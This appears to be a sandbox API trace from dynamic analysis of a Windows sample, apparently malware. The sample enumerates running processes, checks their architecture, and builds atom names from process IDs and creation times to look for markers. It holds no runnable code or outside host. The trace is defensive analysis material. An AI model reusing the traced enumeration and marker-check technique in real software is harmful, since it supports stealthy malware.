	[0097.980] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.980] CloseHandle (hObject=0x248) returned 1
	[0097.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.980] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetLastError () returned 0x5
	[0097.981] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.981] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.981] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.981] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.982] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.983] GetLastError () returned 0x5
	[0097.984] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.984] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.984] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.984] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.984] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.984] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.984] CloseHandle (hObject=0x248) returned 1
	[0097.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.985] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.985] CloseHandle (hObject=0x248) returned 1
	[0097.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ad88, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.985] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.985] CloseHandle (hObject=0x248) returned 1
	[0097.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fea8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0098.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16728) returned 0xc0000004
	[0098.071] VirtualAlloc (lpAddress=0x0, dwSize=0x16828, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0098.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16828, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0098.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0098.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0098.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0098.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0098.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0098.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0098.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65acc8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0098.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0098.077] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.077] CloseHandle (hObject=0x248) returned 1
	[0098.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0098.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0098.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0098.077] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.077] CloseHandle (hObject=0x248) returned 1
	[0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658d88, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0098.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0098.078] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.078] CloseHandle (hObject=0x248) returned 1
	[0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0098.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0098.078] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.078] CloseHandle (hObject=0x248) returned 1
	[0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0098.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0098.079] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.079] CloseHandle (hObject=0x248) returned 1
	[0098.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0098.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0098.079] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.079] CloseHandle (hObject=0x248) returned 1
	[0098.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0098.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0098.079] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.079] CloseHandle (hObject=0x248) returned 1
	[0098.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0098.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0098.080] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.080] CloseHandle (hObject=0x248) returned 1
	[0098.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0098.080] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.080] CloseHandle (hObject=0x248) returned 1
	[0098.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0098.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0098.081] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.081] CloseHandle (hObject=0x248) returned 1
	[0098.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0098.081] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.081] CloseHandle (hObject=0x248) returned 1
	[0098.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0098.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0098.081] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.081] CloseHandle (hObject=0x248) returned 1
	[0098.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0098.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0098.081] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.082] CloseHandle (hObject=0x248) returned 1
	[0098.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ad18, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0098.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0098.082] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.082] CloseHandle (hObject=0x248) returned 1
	[0098.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0098.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0098.082] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.082] CloseHandle (hObject=0x248) returned 1
	[0098.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
